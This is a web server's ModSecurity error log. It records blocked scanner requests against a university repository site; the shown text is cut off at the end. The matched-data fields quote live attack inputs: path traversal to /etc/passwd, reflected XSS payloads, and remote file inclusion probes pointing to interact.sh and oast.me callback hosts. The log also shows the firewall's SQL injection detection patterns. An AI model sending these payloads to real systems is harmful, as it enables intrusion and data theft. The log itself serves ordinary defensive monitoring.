[Tue Aug 29 11:54:59.851634 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAAqdbpkAAAAw"]
[Tue Aug 29 11:55:02.885728 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAAqSwn0AAAAN"]
[Tue Aug 29 11:55:03.852114 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16J8Co-f0AAAoz8AwAAAAS"]
[Tue Aug 29 11:55:04.643851 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAAqY5-EAAAAr"]
[Tue Aug 29 11:55:05.750292 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KcCo-f0AAApHRcUAAAAP"]
[Tue Aug 29 11:55:06.107226 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KsCo-f0AAAqRzJEAAAAM"]
[Tue Aug 29 11:55:06.541417 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAAqRzJIAAAAM"]
[Tue Aug 29 11:55:06.693293 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KsCo-f0AAApOdhMAAAAL"]
[Tue Aug 29 11:55:08.602993 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAApbUckAAAAh"]
[Tue Aug 29 11:55:11.631284 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAApbUc8AAAAh"]
[Tue Aug 29 11:55:12.580787 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16MMCo-f0AAApa-M8AAAAg"]
[Tue Aug 29 11:55:12.664915 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAAqqtbsAAAAA"]
[Tue Aug 29 11:55:14.657371 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAAqSwp0AAAAN"]
[Tue Aug 29 11:55:15.555945 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16M8Co-f0AAApbUeMAAAAh"]
[Tue Aug 29 11:55:16.663813 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NMCo-f0AAAqTvpIAAAAa"]
[Tue Aug 29 11:55:16.751415 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqY6BgAAAAr"]
[Tue Aug 29 11:55:17.591900 2023] [:error] [pid 2735] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAqvjmoAAAAE"]
[Tue Aug 29 11:55:17.726536 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAqY6C8AAAAr"]
[Tue Aug 29 11:55:18.614231 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqsV5MAAAAB"]
[Tue Aug 29 11:55:19.676087 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAAoAk-cAAAAC"]
[Tue Aug 29 11:55:19.752777 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAAqSwsAAAAAN"]
[Tue Aug 29 11:55:20.596674 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAAqw51sAAAAH"]
[Tue Aug 29 11:55:22.607006 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAAolKm0AAAAe"]
[Tue Aug 29 11:55:22.736610 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAAqqteMAAAAA"]
[Tue Aug 29 11:55:23.936366 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAAqSwsgAAAAN"]
[Tue Aug 29 11:55:23.977038 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16O8Co-f0AAAolKncAAAAe"]
[Tue Aug 29 11:55:24.066795 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16PMCo-f0AAAqSws4AAAAN"]
[Tue Aug 29 11:55:24.639292 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAAqsV6gAAAAB"]
[Tue Aug 29 11:55:24.660240 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAApa-O8AAAAg"]
[Tue Aug 29 11:55:25.650669 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:fccc'\\x5c\\x5c\\x22><svg/onload: fccc'\\x5c\\x22><svg/onload"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname 